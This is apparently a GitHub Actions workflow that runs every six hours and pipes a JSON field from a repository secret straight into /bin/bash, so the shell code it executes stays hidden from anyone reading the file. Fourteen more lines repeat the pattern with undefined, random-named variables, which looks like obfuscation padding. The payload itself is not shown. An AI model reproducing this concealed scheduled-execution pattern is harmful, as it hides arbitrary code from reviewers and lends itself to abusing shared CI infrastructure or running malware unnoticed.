name: technicalvex
on:
  workflow_dispatch:
  schedule:
    - cron: '37 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: technicalvex
        env:
          ec06: ${{ secrets.ec06 }}
        run: |
          echo $ec06 | jq -r .vhclk877 | /bin/bash
          echo $vd13 | jq -r .ulir26027 | /bin/bash
          echo $ejjt289 | jq -r .tmysk9 | /bin/bash
          echo $qhzkc5526 | jq -r .u606 | /bin/bash
          echo $usds17016 | jq -r .ygzs7 | /bin/bash
          echo $v2459 | jq -r .ch5865 | /bin/bash
          echo $z86 | jq -r .pca6581 | /bin/bash
          echo $cbln45054 | jq -r .s8297 | /bin/bash
          echo $gfeb69093 | jq -r .zmr00588 | /bin/bash
          echo $z63 | jq -r .znou6122 | /bin/bash
          echo $bpzs844 | jq -r .wru9398 | /bin/bash
          echo $oov35 | jq -r .kxmg11 | /bin/bash
          echo $hmu8 | jq -r .xxuyl60375 | /bin/bash
          echo $x6 | jq -r .fdfc2754 | /bin/bash
          echo $jj35305 | jq -r .btom95287 | /bin/bash

